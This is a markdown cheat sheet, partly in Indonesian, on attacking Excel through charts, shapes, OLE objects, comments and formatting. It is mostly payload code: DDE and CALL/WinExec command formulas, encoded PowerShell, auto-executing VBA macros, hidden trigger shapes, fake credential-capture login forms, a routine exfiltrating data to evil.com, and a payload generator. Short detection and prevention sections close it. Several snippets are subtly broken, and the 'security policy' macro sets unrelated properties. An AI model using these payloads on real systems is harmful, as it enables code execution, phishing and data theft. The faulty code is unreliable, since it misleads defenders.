# Chart Object Injection
> **Chart & Object Injection** - Manipulasi elemen visual Excel (chart, gambar, shape, OLE objects) untuk eksekusi kode atau eksploitasi data
## 📋 Overview
Chart & Object injection adalah teknik serangan yang memanfaatkan elemen-elemen visual dalam Excel untuk menyisipkan payload berbahaya. Serangan ini sulit dideteksi karena payload disembunyikan dalam objek-objek yang tampak tidak berbahaya.
## 🎯 Attack Vectors
### 1. **Chart Data Manipulation**
```xml
=CMD|'/c calc.exe'!A1
```
### 2. **Shape Hyperlink Injection**
```vba
' Shape dengan malicious hyperlink
Sub AddMaliciousShape()
Dim shp As Shape
Set shp = ActiveSheet.Shapes.AddShape(msoShapeRectangle, 100, 100, 100, 50)
' Add malicious hyperlink
shp.Hyperlink.Address = "javascript:eval('alert(\"XSS\")')"
shp.Hyperlink.ScreenTip = "Click me"
End Sub
```
### 3. **OLE Object Embedding**
```vba
' Embed malicious OLE object
Sub EmbedMaliciousOLE()
Dim oleObj As OLEObject
Set oleObj = ActiveSheet.OLEObjects.Add( _
ClassType:="Shell.Explorer.2", _
Link:=False, _
DisplayAsIcon:=False, _
Left:=100, Top:=100, Width:=400, Height:=300)
' Navigate to malicious URL
oleObj.Object.Navigate2 "javascript:alert('OLE Exploit')"
End Sub
```
### 4. **Image Metadata Injection**
```vba
' Image with embedded metadata containing payload
Sub InjectImageMetadata()
Dim img As Shape
Set img = ActiveSheet.Shapes.AddPicture( _
"C:\malicious.jpg", _
LinkToFile:=False, _
SaveWithDocument:=True, _
Left:=100, Top:=100, Width:=200, Height:=200)
' Add ALT text with payload
img.AlternativeText = "=CMD|'/c powershell -enc ...'!A1"
End Sub
```
### 5. **Chart Event Manipulation**
```vba
' Chart events untuk trigger otomatis
Dim WithEvents chartEvent As Chart
Private Sub chartEvent_Activate()
' Auto-execute saat chart diaktifkan
Shell "cmd.exe /c calc.exe", vbHide
End Sub
Private Sub chartEvent_Select(ByVal ElementID As Long, _
ByVal Arg1 As Long, ByVal Arg2 As Long)
' Trigger saat chart element diklik
If ElementID = xlSeries Then
ExecuteMaliciousCode
End If
End Sub
```
## 🛠️ Implementation Techniques
### **Technique 1: Dynamic Chart Update Attack**
```vba
' Chart yang update otomatis dengan malicious data
Sub DynamicChartAttack()
Dim chartObj As ChartObject
Set chartObj = ActiveSheet.ChartObjects.Add(100, 100, 400, 300)
' Create malicious data source
Dim ws As Worksheet
Set ws = ThisWorkbook.Worksheets.Add
' Inject formula dalam data
ws.Range("A1").Formula = "=CALL(""user32"",""WinExec"",""JC"",""calc.exe"",0)"
ws.Range("B1").Value = 100
' Set chart data source
chartObj.Chart.SetSourceData ws.Range("A1:B10")
' Hide worksheet
ws.Visible = xlSheetVeryHidden
End Sub
```
### **Technique 2: SmartArt Exploitation**
```vba
' SmartArt dengan embedded malicious content
Sub SmartArtExploit()
Dim sa As SmartArt
Set sa = ActiveSheet.Shapes.AddSmartArt(Application.SmartArtLayouts(1)).SmartArt
' Modify SmartArt XML untuk injection
Dim xml As String
xml = sa.XML
' Insert malicious XML node
xml = Replace(xml, "", _
"")
' Apply modified XML
sa.XML = xml
End Sub
```
### **Technique 3: Comment & Note Injection**
```vba
' Comments dengan hidden malicious content
Sub CommentInjection()
Dim cell As Range
For Each cell In ActiveSheet.UsedRange
' Add comment dengan hidden payload
If Not cell.Comment Is Nothing Then
cell.Comment.Text Text:="=HYPERLINK(""javascript:alert('XSS')"",""Click"")"
End If
Next cell
End Sub
```
### **Technique 4: Conditional Formatting Abuse**
```vba
' Conditional formatting untuk trigger malicious formula
Sub ConditionalFormattingAttack()
Dim cf As FormatCondition
' Create condition yang trigger malicious formula
Set cf = ActiveSheet.Range("A1:A100").FormatConditions.Add( _
Type:=xlExpression, _
Formula1:="=TRUE")
' Format dengan formula berbahaya
cf.NumberFormat = """=CMD|'/c calc.exe'!A1"""
' Trigger condition
ActiveSheet.Calculate
End Sub
```
## 🎨 Visual Social Engineering
### **Phishing dengan Chart**
```vba
' Chart yang meniru login form
Sub PhishingChart()
Dim chartObj As ChartObject
Set chartObj = ActiveSheet.ChartObjects.Add(50, 50, 400, 300)
' Create fake login interface
With chartObj.Chart
.ChartType = xlColumnClustered
.HasTitle = True
.ChartTitle.Text = "Microsoft Office Login"
' Add fake input fields menggunakan text boxes
Dim txtUser As TextBox
Dim txtPass As TextBox
Set txtUser = ActiveSheet.OLEObjects.Add( _
ClassType:="Forms.TextBox.1", _
Left:=100, Top:=150, Width:=200, Height:=25).Object
Set txtPass = ActiveSheet.OLEObjects.Add( _
ClassType:="Forms.TextBox.1", _
Left:=100, Top:=180, Width:=200, Height:=25).Object
' Capture credentials
txtPass.PasswordChar = "*"
End With
End Sub
```
### **Hidden Object Activation**
```vba
' Object yang aktif saat specific condition
Sub HiddenObjectActivation()
Dim hiddenShape As Shape
' Create shape dengan 0 transparency
Set hiddenShape = ActiveSheet.Shapes.AddShape( _
msoShapeRectangle, 0, 0, 1, 1)
' Set transparency ke 100% (invisible)
hiddenShape.Fill.Transparency = 1
hiddenShape.Line.Visible = False
' Add trigger pada hover
hiddenShape.OnAction = "ExecuteMaliciousPayload"
' Position untuk trigger tidak sengaja
hiddenShape.Top = ActiveSheet.Range("A1").Top
hiddenShape.Left = ActiveSheet.Range("A1").Left
End Sub
```
## 📱 Modern Excel Attack Vectors
### **Excel Online Integration**
```javascript
// JavaScript untuk Excel Online injection
function injectToExcelOnline() {
// Access Excel context
Excel.run(function(context) {
var sheet = context.workbook.worksheets.getActiveWorksheet();
// Add malicious shape
var shape = sheet.shapes.addShape("Rectangle", 100, 100, 200, 100);
shape.textFrame.textRange.text = "Click me";
// Add malicious action
shape.onClick.add(function() {
// Redirect to phishing site
window.location.href = "https://evil.com/phishing";
});
return context.sync();
});
}
```
### **Power BI Integration Abuse**
```vba
' Power BI integration untuk data theft
Sub PowerBIIntegration()
Dim pb As Object
Set pb = CreateObject("PowerBI.DataModel")
' Extract data dari Power BI model
Dim tables As Variant
tables = pb.GetTables()
' Exfiltrate data via HTTP
Dim http As Object
Set http = CreateObject("MSXML2.XMLHTTP.6.0")
For Each table In tables
http.Open "POST", "https://evil.com/exfil", False
http.Send table.Name & "|" & table.RowCount
Next table
End Sub
```
## 🔍 Detection Methods
### **Manual Detection**
1. **Chart Inspection** - Check chart data sources for suspicious formulas
2. **Shape Properties** - Review hyperlinks and actions on shapes
3. **OLE Objects** - Identify embedded objects from untrusted sources
4. **Image Metadata** - Check ALT text and embedded scripts
5. **XML Inspection** - Review chart XML for malicious content
### **Automated Detection**
```vba
' Script untuk detect suspicious objects
Sub DetectMaliciousObjects()
Dim suspiciousObjects As New Collection
Dim obj As Shape
' Check semua shapes
For Each obj In ActiveSheet.Shapes
' Suspicious patterns
If InStr(obj.AlternativeText, "CMD|") > 0 Then
suspiciousObjects.Add obj.Name & " - CMD in ALT text"
End If
If obj.Hyperlink.Address <> "" And _
InStr(obj.Hyperlink.Address, "javascript:") > 0 Then
suspiciousObjects.Add obj.Name & " - JavaScript hyperlink"
End If
If InStr(obj.OnAction, "Shell") > 0 Or _
InStr(obj.OnAction, "CreateObject") > 0 Then
suspiciousObjects.Add obj.Name & " - Suspicious OnAction"
End If
Next obj
' Report findings
Dim item As Variant
For Each item In suspiciousObjects
Debug.Print "SUSPICIOUS: " & item
Next item
End Sub
```
## 🛡️ Prevention Strategies
### **For Users**
1. **Disable Macros** - Keep macros disabled by default
2. **Protected View** - Use protected view for files from internet
3. **Review Objects** - Check all objects before enabling content
4. **Update Software** - Keep Excel and security patches updated
5. **Sandbox Environment** - Open suspicious files in isolated environment
### **For Administrators**
```vba
' Policy enforcement untuk object security
Sub EnforceObjectSecurity()
' Disable OLE embedding
Application.OLEObjectPropertyChangeEnabled = False
' Restrict hyperlink creation
Application.AutoCorrect.AutoExpandListRange = False
' Force Protected View
Application.FileDialog(msoFileDialogOpen).AllowMultiSelect = False
' Disable ActiveX controls
ActiveWorkbook.WebOptions.AllowPNG = False
End Sub
```
## 📊 Real-World Examples
### **Case Study 1: Financial Report Injection**
```xml
Sheet1!$B$1
=CALL("user32","WinExec","JC","powershell -enc ...",0)
```
### **Case Study 2: Supply Chain Attack via Template**
```vba
' Template dengan hidden malicious chart
Sub Auto_Open()
' Check if first time opening
If ThisWorkbook.CustomDocumentProperties("FirstRun") Is Nothing Then
' Add custom property
ThisWorkbook.CustomDocumentProperties.Add Name:="FirstRun", _
Type:=msoPropertyTypeBoolean, Value:=False
' Create malicious chart yang hidden
CreateHiddenMaliciousChart
' Exfiltrate data
ExfiltrateSensitiveData
End If
End Sub
```
### **Case Study 3: Phishing via Interactive Dashboard**
```vba
' Interactive dashboard dengan credential theft
Sub CreatePhishingDashboard()
Dim dashboard As ChartObject
Set dashboard = ActiveSheet.ChartObjects.Add(50, 50, 800, 600)
' Create professional looking dashboard
With dashboard.Chart
.ChartTitle.Text = "Company KPI Dashboard - Login Required"
' Add fake login controls
AddFakeLoginControls dashboard
' Setup credential capture
SetupCredentialCapture
End With
End Sub
```
## 🔧 Tools & Resources
### **Analysis Tools**
* **OLE/COM Object Viewer** - Inspect embedded objects
* **XML Notepad** - Review chart XML structure
* **Sysinternals Process Monitor** - Monitor suspicious activities
* **Microsoft Office Configuration Analyzer Tool** - Security analysis
* **PowerShell** - Automated detection scripts
### **Payload Generation**
```vba
' Payload generator untuk chart injection
Function GenerateChartPayload(command As String) As String
Dim encoded As String
encoded = Base64Encode(command)
GenerateChartPayload = "=CALL(""user32"",""WinExec"",""JC"",""cmd.exe /c " & _
"powershell -enc " & encoded & """,0)"
End Function
```
***
## 📝 Quick Reference
### **Common Injection Points**
* Chart data sources and labels
* Shape hyperlinks and actions
* OLE embedded objects
* Image ALT text and metadata
* Comments and notes
* Conditional formatting formulas
* SmartArt XML content
### **Detection Checklist**
* [ ] Review all chart data sources for formulas
* [ ] Check shape hyperlinks for JavaScript
* [ ] Inspect OLE objects from untrusted sources
* [ ] Validate image metadata and ALT text
* [ ] Scan comments for suspicious content
* [ ] Analyze conditional formatting rules
* [ ] Review SmartArt XML for injections
### **Prevention Checklist**
* [ ] Keep Excel updated with latest security patches
* [ ] Use Protected View for external files
* [ ] Disable macros by default
* [ ] Restrict OLE object embedding
* [ ] Implement content inspection policies
* [ ] Educate users about object-based threats
* [ ] Use application whitelisting
***
*📅 Last Updated: October 2024* *👥 Maintainers: Catatan Seekor Team* *🎯 Coverage: Chart injection, object manipulation, visual attacks* *⚠️ Disclaimer: Educational purposes only, use responsibly*